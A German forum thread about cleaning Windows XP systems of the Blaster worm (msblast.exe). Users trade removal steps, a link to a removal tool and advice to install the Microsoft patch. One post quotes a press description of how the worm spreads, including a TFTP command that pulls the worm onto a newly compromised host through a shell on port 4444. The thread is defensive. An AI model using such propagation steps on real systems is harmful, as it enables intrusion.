Jump to content

NT Autoritätssystem ?!?!?


Der letzte Beitrag zu diesem Thema ist mehr als 180 Tage alt. Bitte erstelle einen neuen Beitrag zu Deiner Anfrage!

Empfohlene Beiträge

Kurze Zusammenfassung:

 

- Registryeintrag gelöscht

- nach dem Neustart (ohne Internetverbindung) die msblast.exe gelöscht, zu finden unter WinNT\System32.

- Neueste Virendefinitionen (TrendMicro) gezogen, Scan durchlaufen lassen, nichts mehr gefunden.

- Vor dem Onlinegehen die Win XP-Firewall aktiviert. (<- in Ermangelung einer Anderen)

 

Nach ca. 1 Stunde online noch keine Probleme aufgetreten, auch kein Registry-Eintrag oder eine msblast.exe vorhanden.

 

 

Allerdings war da noch ne Datei, die hatte die Endung .pf, wenn mich nicht alles täuscht, sucht mal nach der, die sollte nämlich auch noch dazu gehören. Weiss leider nicht mehr, wo genau die war... Sorry... :(

 

//Nachtrag:

 

Bei TrendMicro ist jetzt das 604 verfügbar.

Link zu diesem Kommentar

es müsste doch eigentlich ausreichen wenn du:

 

auf der Festplatte die datei suchst, ist ne exe datei die sich im verzeichnis

 

windows=>windows32 aufhält und noch ne zusatzdatei die in prefetch vorkommt.

 

such einfach per suchfunktion die datei:

 

msblast.exe

 

wenn du die gefunden hast:

 

sicherheitsupdate für windows ziehen, link dazu ist hier im thread gepostet, danach müsste alles wieder klappen.

Link zu diesem Kommentar

Hi, danke erstma für die ganzen Tips, ABER

habe der Eintrag in der Reg is nicht vorhanden, und die msblat.exe ist auch nicht auf meinem Rechner. Hatte aber das gleiche Problem wie alle anderen hier, habe den ganzen Segen jetzt einfach gepatch, bis jetzt läufts auch ganz gut, mir ist aber bei meinen Neustarts aufgefallen, das meine Netzwerkverbindungen sich jetzt sehr langsam aufbauen, dauert so ca 2 min, die waren vor dem Prob aber sofort oben, weiß jetzt nich wirklich wieso oder warum sich das verändert hat.Benutze Xp Prof, weiß jmd Rat zu den Netzwerkverbindungen??Hatte damit mein Rechner nicht alle 5 min runterfährt dem RPC-Dienst verboten runterzufahren, habe das ganze jetzt aber wieder zurückgesetzt.

Nun ja wolln mal schaun wie langes so bleibt :D

Link zu diesem Kommentar

Hi,

 

zum Glück hab ich euer board gefunden, dachte schon, ich wäre allein mit diesem Problem.

 

Nur zur Ergänzung, auf Heise gibt's einen Link zu einem Removal-Tool, das genau diesen Wurm entfernt:

 

http://www.sarc.com/avcenter/venc/data/w32.blaster.worm.removal.tool.html

 

Wichtig: Bei Windows XP sollte man *vor* der Ausführung des Tools die Systemwiederherstellung deaktivieren (Start->Einstellungen->Systemsteuerung->System->Reiter Systemwiederherstellung); nachdem das Tool den Wurm beseitigt hat, Neustart und dann Systemwiederherstellung wieder aktivieren.

 

Ist die einfachste Art, den Wurm loszuwerden.

 

Und ach ja, danach den Microsoft patch runterladen und installieren.

Link zu diesem Kommentar

So also meine Kiste funzt auch wieder!!! Ich hab den Virus ersma mit dem Antivir gelöscht und die komplette Datei, dann hab ich die Registry gesäubert und dann das Removal-Tool ausgeführt und dann den Patch von MS installiert!!Aber ich frage mich immer noch, wofür war die Datei msblast.exe denn gut??Gehörte die zu Windows oder war das eine Datei vom Virus?? Ausserdem wenn die Datei zu Windows gehörte, kann es dann nicht sein das die Datei irgendwo fehlt und einige Anwendungen nicht mehr richtig gehen????

Link zu diesem Kommentar

Hier ein Auszug aus dem Heise-Artikel

Auf befallenenen Systemen (A) startet der Wurm einen TFTP-Server und greift weitere Windows-Systeme (B) auf Port 135 an. War ein Angriff erfolgreich, wird der eingeschleuste Code ausgeführt, der auf System B eine Shell auf Port 4444 öffnet. System A veranlasst System B mittels TFTP (tftp <host a> get msblast.exe) die Datei msblast.exe in das Verzeichnis %WinDir%\System32 nachzuladen und zu starten. Anschließend installiert sich der Wurm auf System B, schließt Port 4444, startet einen TFTP-Server und greift weitere Systeme an.

Link zu diesem Kommentar
Der letzte Beitrag zu diesem Thema ist mehr als 180 Tage alt. Bitte erstelle einen neuen Beitrag zu Deiner Anfrage!

Schreibe einen Kommentar

Du kannst jetzt antworten und Dich später registrieren. Falls Du bereits ein Mitglied bist, logge Dich jetzt ein.

Gast
Auf dieses Thema antworten...

×   Du hast formatierten Text eingefügt.   Formatierung jetzt entfernen

  Only 75 emoji are allowed.

×   Dein Link wurde automatisch eingebettet.   Einbetten rückgängig machen und als Link darstellen

×   Dein vorheriger Inhalt wurde wiederhergestellt.   Editor-Fenster leeren

×   Du kannst Bilder nicht direkt einfügen. Lade Bilder hoch oder lade sie von einer URL.

×
×
  • Neu erstellen...